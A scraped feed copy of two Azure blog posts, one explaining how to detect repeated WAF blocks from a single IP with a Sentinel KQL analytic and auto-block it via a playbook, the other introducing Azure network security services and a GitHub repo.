  | project AnomalyHour, TimeGeneratedMax, ClientIPAddress, ClientIPlist, Portlist, HourlyCount, PercentTotal, Total, baseline, score, anomalies, requestUri_s, trackingReference_s, _ResourceId, SubscriptionId, ruleName_s, hostname_s, policy_s, action_s
  | summarize HourlyCount=sum(HourlyCount), StartTimeUtc=min(TimeGeneratedMax), EndTimeUtc=max(TimeGeneratedMax), SourceIPlist = make_set(ClientIPAddress), Portlist = make_set(Portlist) by ClientIPAddress, AnomalyHour, Total, baseline, score, anomalies, requestUri_s, trackingReference_s, _ResourceId, SubscriptionId, ruleName_s, hostname_s, policy_s, action_s
  | extend HostCustomEntity = _ResourceId, IPCustomEntity = ClientIPAddress</LI-CODE>
<P>&nbsp;</P> <H2>Generate Incidents using Azure Sentinel Analytics</H2> <P>&nbsp;</P> <P>Azure Sentinel uses the concept of Analytics to accomplish Incident creation, alerting, and eventually automated response. The main piece of any Analytic rule is the KQL query that powers it. If the query returns data (over a configured threshold), an alert will fire. To use this in practice, you need to craft a query that returns results worthy of an alert.</P> <P>&nbsp;</P> <P>The logic used can be complex, possibly adapted from the hunting logic outlined above, or fairly basic like the example below. It can be difficult to know what combination of WAF events warrants attention from analysts or even an automated response. 
We will assume the WAF has been tuned to eliminate most false positives, and that rule matches are usually indicative of malicious behavior.</P> <P>&nbsp;</P> <P>The Analytic Rule we will look at serves the purpose of detecting repeated attacks from the same source IP address. We simply look for WAF rule matches, which amount to traffic being blocked with WAF in Prevention Mode, and count how many there have been from the same IP in the last 5 minutes. The thinking is that if a single source is repeatedly triggering blocks, they must be up to no good.</P> <P>&nbsp;</P>
<LI-CODE lang="sql">AzureDiagnostics
| where Category == "FrontdoorWebApplicationFirewallLog"
| where action_s == "Block"
| summarize StartTime = min(TimeGenerated), EndTime = max(TimeGenerated), count() by clientIP_s, host_s, _ResourceId
| where count_ &gt;= 3
| extend clientIP_s, host_s, count_, _ResourceId
| extend IPCustomEntity = clientIP_s
| extend URLCustomEntity = host_s
| extend HostCustomEntity = _ResourceId</LI-CODE>
<P>&nbsp;</P> <P>Notice that we are using entity mapping for the resource ID of the Front Door that blocked the requests; this becomes important when creating response actions with Playbooks. 
The full details of our example analytic can be seen in the screen capture below:</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="WAFAnalytic2.gif" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/222600i3465939307618F49/image-size/large?v=v2&amp;px=999" role="button" title="WAFAnalytic2.gif" alt="WAFAnalytic2.gif" /></span></P> <P>&nbsp;</P> <P>With this Analytic active, any source IP address that generates 3 or more rule matches in 5 minutes will generate an alert and incident. A playbook will also be automatically triggered, which is covered in the next section.</P> <P>&nbsp;</P> <H2>Respond to Incidents with Playbooks</H2> <P>&nbsp;</P> <P>A Sentinel Playbook is what is used to execute actions in response to Incidents. Playbooks are mostly the same as <A href="#" target="_blank" rel="noopener">Logic Apps</A>, which are mostly the same as <A href="#" target="_blank" rel="noopener">Power Automate</A>. Sentinel Playbooks always start with the Sentinel trigger, which will pass dynamic content into the Logic App pipeline. Specifically, we are looking for the Resource ID of the Front Door (the Playbook also supports Application Gateway) in order to look up the information needed to perform the remediation actions.</P> <P>&nbsp;</P> <P>From the example in the Analytics section, we have detected multiple WAF rule matches from the same IP address, and we want to block any further action this attacker attempts. Of course the attacker could just keep attempting to exploit the application from different IP addresses, as they often do, but automatically blocking each IP is a low effort method to make the payoff as difficult as possible.</P> <P>&nbsp;</P> <P>The end goal of this Playbook is to create or modify a custom rule in a WAF Policy to block requests from a certain IP address. 
This is accomplished through the Azure REST API in the following broad steps:</P> <UL> <LI>Set variables and parse entities from the Incident</LI> <LI>Check WAF type – Front Door or App Gateway</LI> <LI>Get the associated WAF Policy</LI> <LI>Read existing custom rules and store in an array</LI> <LI>If a rule called “SentinelBlockIP” already exists, add the attacking IP to the rule</LI> <LI>If no rule exists yet, create a custom rule blocking the attacking IP</LI> <LI>Re-assemble the WAF Policy JSON with the new or updated custom rule</LI> <LI>Initiate a PUT request against the Azure REST API to update the WAF Policy</LI> </UL> <P>Here is what the Playbook looks like:</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="WAFPlaybook.gif" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/222579iB57F93B22776F225/image-size/large?v=v2&amp;px=999" role="button" title="WAFPlaybook.gif" alt="WAFPlaybook.gif" /></span></P> <P>&nbsp;</P> <P><A href="#" target="_blank" rel="noopener">This playbook</A> can be deployed from our GitHub repository.</P> <P>&nbsp;</P> <P>To see everything we covered in this post and more in video format, <A href="#" target="_blank" rel="noopener">check it out here</A>.</P> <P>&nbsp;</P> <P>It is our hope that you now have the tools and skills needed to take log data from Azure WAF and use it in Azure Sentinel to detect, investigate, and automatically respond to threats against your web applications.</P> Tue, 09 Feb 2021 17:57:39 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/integrating-azure-web-application-firewall-with-azure-sentinel/ba-p/1720306 Anthony_Roman 2021-02-09T17:57:39Z Introducing the Azure Network Security Tech Community and Github Repo https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/introducing-the-azure-network-security-tech-community-and-github/ba-p/1657298 <P>Hello World!</P> <P>&nbsp;</P> <P>With so 
many Azure customers relying on native Azure network security tools to secure their networks and applications, it is clear that there is a demand for more information on this topic. We are here to deliver just that. My team is dedicated to helping customers deploy and get the most out of Azure Network Security services, and we will be using Tech Community to amplify our voices.</P> <P>&nbsp;</P> <H2>What are the Azure Network Security services?<span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="NetSec.png" style="width: 200px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/217792iF6E19E3BB46BCFC1/image-size/small?v=v2&amp;px=200" role="button" title="NetSec.png" alt="NetSec.png" /></span></H2> <P>Azure network security is a set of native services meant to secure cloud and hybrid networks using the Zero Trust approach. To narrow it down, the primary tools we will cover here are Azure Firewall and Firewall Manager, Azure DDoS Protection, and Azure WAF. Yes, we’re aware that WAF deals with Application Security and not as much Network Security, but we’re bringing the concepts together. Web applications are delivered over networks, right?</P> <P>&nbsp;</P> <P>Naturally while we are concentrating on these core services, that does not mean others will not be discussed. Quite the opposite, in fact. Building a secure Azure network can involve a vast array of resources. 
Expect attention to also be paid to Azure Bastion, Network Watcher, NSGs, as well as core networking components ranging from Route Tables to Virtual WAN.</P> <P>&nbsp;</P> <P>Here’s a quick introduction to our primary tools for those that are unfamiliar:</P> <P>&nbsp;</P> <H3>Azure Firewall<span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="Firewall.png" style="width: 200px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/217780i317B878C9759A2F7/image-size/small?v=v2&amp;px=200" role="button" title="Firewall.png" alt="Firewall.png" /></span></H3> <P>Azure Firewall is the Azure-native PaaS firewall. Not to be confused with NSGs or resource firewalls on other PaaS services, Azure Firewall is built to be a centrally deployed and managed service that handles all the traffic from your regional deployments. Being a PaaS service, it auto-scales to accommodate increasingly demanding workloads, and it can be managed using the tools and methods you are already using to deploy and manage other resources – CLI, API, ARM, or whichever combination of abbreviations suits you best.</P> <P>&nbsp;</P> <P>Azure Firewall is meant to perform all the same functions as most Network Virtual Appliances (NVAs), including segmenting east-west traffic within your VNets and controlling inbound and outbound traffic. <A href="#" target="_blank" rel="noopener">Learn more in the docs</A>.</P> <P>&nbsp;</P> <H3>Azure Firewall Manager<span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="FirewallManager.png" style="width: 200px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/217782i4095BA45AE4DB8A6/image-size/small?v=v2&amp;px=200" role="button" title="FirewallManager.png" alt="FirewallManager.png" /></span></H3> <P>Firewall Manager is a service that serves a growing number of purposes. First, it allows for easy management of multiple Azure Firewalls. 
By abstracting the Firewall Policy away from each individual Firewall, you can use Firewall Manager to assign a central set of policies to one or many Firewalls across the globe. Additionally, Firewall Manager can be used to manage security services in Azure VWAN Hubs, which can either be more Azure Firewalls or third-party services such as Zscaler and iboss.</P> <P>&nbsp;</P> <P><A href="#" target="_blank" rel="noopener">Read the docs</A> to get the full story on Firewall Manager.</P> <P>&nbsp;</P> <H3>Azure WAF<span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="WAF.png" style="width: 200px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/217783i491D0097C21E1459/image-size/small?v=v2&amp;px=200" role="button" title="WAF.png" alt="WAF.png" /></span></H3> <P>Azure Web Application Firewall, as the name implies, is a firewall specifically meant to inspect web application traffic. Azure WAF can be attached to Application Gateway, Front Door, or CDN. There are some differences based on which service WAF is attached to, but the major function is the same – WAF analyzes decrypted traffic to match every request against its rules. 
These rules can consist of managed rulesets that look for common attacks found in the OWASP Top 10, bot protection rulesets that can block known malicious bot traffic, and custom rules that can look for various combinations of patterns.</P> <P>&nbsp;</P> <P>To learn more, <A href="#" target="_blank" rel="noopener">read some more docs</A>.</P> <P>&nbsp;</P> <H3>Azure DDoS Protection Standard<span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="DDoSProtection.png" style="width: 166px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/217784iDEB264C369D8E26B/image-size/small?v=v2&amp;px=200" role="button" title="DDoSProtection.png" alt="DDoSProtection.png" /></span></H3> <P>Every resource that lives in an Azure data center benefits from the inbuilt platform-level DDoS Protection. Our DDoS Protection infrastructure is in place to ensure the availability of each Azure region, and this protection is inherited by every Azure service. For customers that need to ensure that their workloads are protected against every attack, DDoS Protection Standard is available to tune the protection mechanisms to each individual workload. 
Along with Standard come several other features, which include cost protection for resources that auto-scale during an attack, high-priority support during attacks, and some great logging to feed to your SOC.</P> <P>&nbsp;</P> <P>This is the final time in this post that <A href="#" target="_blank" rel="noopener">docs will be read</A>.</P> <P>&nbsp;</P> <H2>GitHub Repository<span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="GitHub-Mark-120px-plus.png" style="width: 120px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/217785i1DD31E8F9D62F29D/image-size/large?v=v2&amp;px=999" role="button" title="GitHub-Mark-120px-plus.png" alt="GitHub-Mark-120px-plus.png" /></span></H2> <P>&nbsp;</P> <P>There has been such an appetite among our customers for useful technical content that we decided to create a GitHub repo just for Azure network security. Find it at <A href="#" target="_blank" rel="noopener">Aka.ms/AzNetSec</A>. You will find a combination of scripts, Policies, KQL queries, ARM templates, Azure Monitor Workbooks, and other odds and ends. Our goal is to make everything as useful as possible to take the guesswork out of using our tools.</P> <P>&nbsp;</P> <P>We encourage contributions from the community, so if you have something you think may be useful to others, don’t hesitate to fork and send us a pull request. Even if you don’t wish to contribute, please leave us feedback and suggestions for new content to create; we strive for continuous improvement. If you have suggestions or feedback regarding specific product features, please use <A href="#" target="_blank" rel="noopener">Azure User Voice</A>. Yes, we do monitor it and use the feedback when planning features.</P> <P>&nbsp;</P> <H2>Tech Community Plans</H2> <P>&nbsp;</P> <P>This has been a quick introductory post to share this team’s focus and areas of interest. 
We have lots of ideas for things to share in the future based on our experience with customers, but we also want to listen to the feedback we receive here. If there is something you would like to know more about, please leave a comment here or post about it in the Network Security <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/bd-p/AzureNetworkSecurity" target="_blank" rel="noopener">conversations space</A>.</P> <P>&nbsp;</P> Fri, 11 Sep 2020 16:41:31 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/introducing-the-azure-network-security-tech-community-and-github/ba-p/1657298 Anthony_Roman 2020-09-11T16:41:31Z